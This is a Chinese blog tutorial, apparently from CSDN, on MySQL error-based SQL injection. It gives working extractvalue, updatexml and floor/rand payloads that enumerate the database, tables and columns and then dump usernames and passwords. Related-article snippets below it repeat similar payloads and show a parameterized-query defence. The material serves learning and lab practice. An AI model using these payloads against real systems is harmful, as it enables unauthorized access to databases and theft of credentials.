sql注入之报错注入

最新推荐文章于 2025-03-14 21:44:10 发布
最新推荐文章于 2025-03-14 21:44:10 发布
阅读量205 收藏
点赞数
分类专栏: 网络安全学习 文章标签: sql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44277013/article/details/132080341
版权

sql注入之报错注入

报错注入原理

报错注入是通过特殊函数错误使用并使其输出错误结果来获取信息的。
在遇到有报错回显,但是没有数据回显的情况下可以利用。

报错注入的函数

  1. floor() :向下取整
  2. extractvalue():对XML文档进行查询的函数,当参数的格式不正确而产生的错误,会返回参数的信息
    函数语法:extractvalue(XML_document,XPath_string)
    payload: and (extractvalue(1,concat(0x7e,(select user()),0x7e)))
  3. updatexml():更新xml文档的函数,原理跟extracvalue一样。
    函数语法:updatexml(XML_document, XPath_string, new_value)
    payload: updatexml(1,concat(0x7e,(select user()),0x7e),1)
    前后添加~使其不符合xpath格式从而报错。
  4. exp():以e为底的指数函数
  5. rand()+group()+count()

报错注入流程

  1. 查数据库名:and extractvalue(1,concat(0x7e,(select database())))
    and updatexml(1,concat(0x7e,(select database())),1) --+

在这里插入图片描述
注:extractvalue()接受两个字符串参数,一个XML标记片段 xml_frag和一个XPath表达式 xpath_expr(也称为 定位器),它返回CDATA第一个文本节点的text(),该节点是XPath表达式匹配的元素的子元素。
第一个参数可以传入目标xml文档,第二个参数是用Xpath路径法表示的查找路径。
如果要让extractvalue()这个函数产设错误并报告就需要在使用过程中有语法错误,即使用这个语法中本身不含有或者不支持的字符。
在ASCII码表中,0x7e这个十六进制数代表符号 ~ ,~这个符号在xpath语法中是不存在的,因此总能报错。
2. 爆表名:and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))--+ 或者and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) --+
在这里插入图片描述
3. 爆列名:and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+或者and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1) --+
在这里插入图片描述
注:使用group_concat的形式对字段进行操作后使得查询出来的字段太长,会造成缺省。可以通过mid函数来解决。
MID 函数用于从文本字段中提取字符。
mid()函数语法如下:SELECT MID(column_name,start[,length]) FROM table_name
其中第一个参数是要提取的表名,第二个参数为起始位置,第三个参数为返回的字符个数。
上述语句可改为:and extractvalue(1,concat(0x7e,mid((select group_concat(column_name) from information_schema.columns where table_name='users'),1,31))) --+若仍未显示完全,可以通过改变起始位置的参数来调整显示文本。
4. 爆值: and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a, password) from users))) --+或者and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1) --+
在这里插入图片描述

SQL注入报错注入
m0_56578216的博客
08-23 1305
table_name=0x636d735f7573657273是cms_users表名转16进制后的结果,如果直接用表名’cms_users’,会导致表名被cms**转义并报错,**所以需要避免单引号的使用。在注入点的判断过程中,发现数据库中SQL 语句的报错信息,会显示在页面中,因此可以利用报错信息进行注入。limit 0,1:用来限定取第0行的一行记录,由于有8个表,也就是有8行数据,多取会报错。limit 1,1:用来限定取第1行的一行记录,由于有3行数据,多取会报错
SQL注入报错注入函数
cyjmosthandsome的博客
02-26 7035
一、extractvalue() extractvalue(xml_frag,xpath_expr)函数接受两个参数,第一个为XML标记内容,也就是查询的内容,第二个为XPATH路径,也就是查询的路径。如果没有匹配内容,不管出于何种原因,只要xpath_expr有效,并且xml_frag由正确嵌套和关闭的元素组成 - 返回空字符串。不区分空元素的匹配和无匹配。但是如果X...
SQL注入报错注入
qq_68163788的博客
01-27 3180
QL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入中注入恶意的SQL代码来执行未经授权的数据库操作。报错注入是一种SQL注入的类型,它利用数据库在执行恶意SQL语句时产生的错误消息来获取有关数据库结构和数据的信息。 假设有一个使用用户输入构建SQL查询的应用程序。攻击者可以通过在输入中注入恶意的SQL代码来触发数据库错误,并从错误消息中获取有关数据库的信息,如表名、列名等。这些信息可以帮助攻击者进一步利用数据库。
SQL注入报错注入函数
热门推荐
lightsec
03-15 1万+
前言 报错注入的前提是当语句发生错误时,错误信息被输出到前端。其漏洞原因是由于开发人员在开发程序时使用了print_r (),mysql_error(),mysqli_connect_error()函数将mysql错误信息输出到前端,因此可以通过闭合原先的语句,去执行后面的语句。 常用报错函数 updatexml() 是mysql对xml文档数据进行查询和修改的xpath函数 extractvalue() 是mysql对xml文档数据进行查询的xpa...
SQL注入-常见的报错注入类型详解
lza20001103的博客
03-14 1249
SQL注入-常见的报错注入类型详解
SQL四大注入报错函数
weixin_44352521的博客
12-12 303
1. floor() id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) 2. extractvalue() id = 1 and (extractvalue(1, concat(0x5c,(sele...
SQL注入方法-报错注入
acepanhuan的博客
02-11 1185
SQL注入方法-报错注入
SQL 注入报错注入、延时注入、布尔盲注
2301_77160226的博客
08-27 1574
SQL 注入攻击中,报错注入、延时注入和布尔盲注是常见的攻击手段。这些攻击方式利用了数据库系统在处理用户输入时的漏洞,从而获取敏感信息或者执行恶意操作。本文将详细介绍这三种 SQL 注入攻击方式的原理和实现方法。
sql注入(6)报错注入
c10udz的博客
05-11 5793
sql报错注入函数
pop364的博客
04-24 291
#1.floor() #数据尾部多一个1 #?id=1'and (select count(*) from information_schema.tables group by concat(database(),floor(rand(0)*2)))--+ #?id=1' union select 1,2,count(*) from information_schema.tables group ...
SQL注入报错注入方法汇总
wanggonghanfei的博客
10-03 2479
响应过程:用户在前台页面输入检索内容后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行数据库将执行的结果返回后台,后台将数据库执行的结果无加区别的显示在前台页面0.2 类型。
SQL注入-报错注入
LJH1999ZN的博客
02-09 1万+
sql注入报错注入的演示与介绍
mysql注入报错函数_关于SQL注入的五大报错注入函数
weixin_33502400的博客
02-02 387
~全部都以查user()为例子~1.floor()id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)2.extractvalue()id = 1 and (extractvalue(1, concat...
sql注入-报错注入
爆金币了,老登!
07-09 637
针对于dvwa靶场的sql报错注入
SQL注入报错注入
Forget_liu的博客
06-10 1833
第二次是假设group by后面的字段的值在虚拟表中不存在,那就需要把它插入到虚拟表中,这里在插入时会进行第二次运算,由于rand函数存在一定的随机性,所以第二次运算的结果可能与第一次运算的结果不一致,但是这个运算的结果可能在虚拟表中已经存在了,那么这时的插入必然导致主键的重复,进而引发错误。很显然rand(0)是伪随机的,有规律可循,这也是我们采用rand(0)进行报错注入的原因,rand(0)是稳定的,这样每次注入都会报错,而rand()则需要碰运气了,我们测试结果如下。//以下案例代码是抄的。
sql注入出现报错信息
最新发布
03-17
### SQL注入报错的原因分析与解决方案 #### 一、SQL注入报错原因 SQL注入过程中出现的报错通常是因为输入的数据破坏了原始SQL语句的语法结构,或者触发了数据库的安全机制。以下是常见的几种报错场景及其成因: 1. **语法错误** 当攻击者尝试通过拼接恶意字符串来修改SQL查询逻辑时,可能会导致SQL语句无法正常解析而引发语法错误。例如,在`sqli-labs`的第一关中,如果仅闭合单引号而不处理后续部分,则可能导致前端页面显示类似“syntax error”的提示[^2]。 2. **权限不足** 数据库操作可能涉及特定用户的访问控制策略。当执行某些敏感命令(如读取文件或调用系统函数)时,若当前账户缺乏相应权限,也会抛出异常信息。 3. **防御措施生效** 现代Web应用往往配备多种防护手段对抗SQL注入威胁,比如WAF(Web Application Firewall),它能够识别并拦截可疑请求;另外还有参数化查询等编程层面的最佳实践可以有效规避此类漏洞的发生。 4. **数据类型冲突** 如果注入点预期接收整数型参数却收到字符型输入,那么转换失败同样会造成运行期崩溃现象。 #### 二、解决SQL注入报错的方法 针对上述提到的各种情形,下面列举了一些通用的技术应对办法: 1. **调整测试载荷(Payload)** 对于简单的语法问题,可以通过精心设计payload使得最终形成的完整query既满足业务需求又能绕过初步筛查。举个例子来说就是采用编码技术隐藏特殊符号的真实含义直到被目标引擎解读为止。 2. **利用条件判断代替直接输出** 考虑到有些场合不允许看到确切的error message,此时可改用布尔盲注法或者其他间接方式获取所需情报而不是依赖显式的fault report. 3. **借助工具自动化探索过程** 使用像SQLMap这样的开源软件可以帮助快速定位潜在风险区域以及自动适应不同的环境配置从而减少手动调试的工作量。假如遇到Windows平台上关于SQLMap本身的setup难题的话,按照官方文档指示逐步排查直至成功部署也是必要的步骤之一[^3]. 4. **增强应用程序安全性建议** - 实施严格的输入验证流程确保所有外部传入的数据都经过适当过滤后再参与内部运算。 - 推荐始终优先选用预编译语句而非动态组装string形式的commands. - 定期审查源码查找任何可能成为突破口的位置加以修正完善。 ```python import pymysql.cursors connection = pymysql.connect(host='localhost', user='user', password='passwd', database='db', cursorclass=pymysql.cursors.DictCursor) try: with connection.cursor() as cursor: sql = "SELECT * FROM users WHERE username=%s AND password=MD5(%s)" cursor.execute(sql, ('admin', 'password')) # 参数绑定防止SQL Injection finally: connection.close() ``` 以上代码片段展示了如何安全地构建SQL查询以防范传统意义上的injection attack。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值